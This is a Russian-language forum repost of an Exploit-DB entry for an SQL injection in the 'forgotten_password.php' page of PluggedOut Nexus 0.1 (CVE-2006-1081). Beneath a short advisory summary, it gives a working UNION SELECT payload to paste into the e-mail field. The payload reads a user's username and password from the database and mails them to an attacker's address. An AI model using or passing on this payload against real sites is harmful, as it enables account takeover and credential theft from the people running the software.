Exploit PluggedOut Nexus 0.1 - 'forgotten_password.php' SQL Injection

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
27342
Проверка EDB
  1. Пройдено
Автор
HAMID EBADI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-1081
Дата публикации
2006-03-02
Код:
source: https://www.securityfocus.com/bid/16915/info

PluggedOut Nexus is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 

Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Nexus 0.1 is reportedly affected by this issue.

The following proof of concept exploit is available:
Insert this code in E-Mail Address form (http://www.example.com/Nexus/forgotten_password.php) :
hamidnetworksecurityteam' union select
cUsername,cPassword,'[email protected]' from
nexus_users WHERE nUserId=1 and '1'='1

This will email the password for userID=1 to [email protected].
 
Источник
www.exploit-db.com

Похожие темы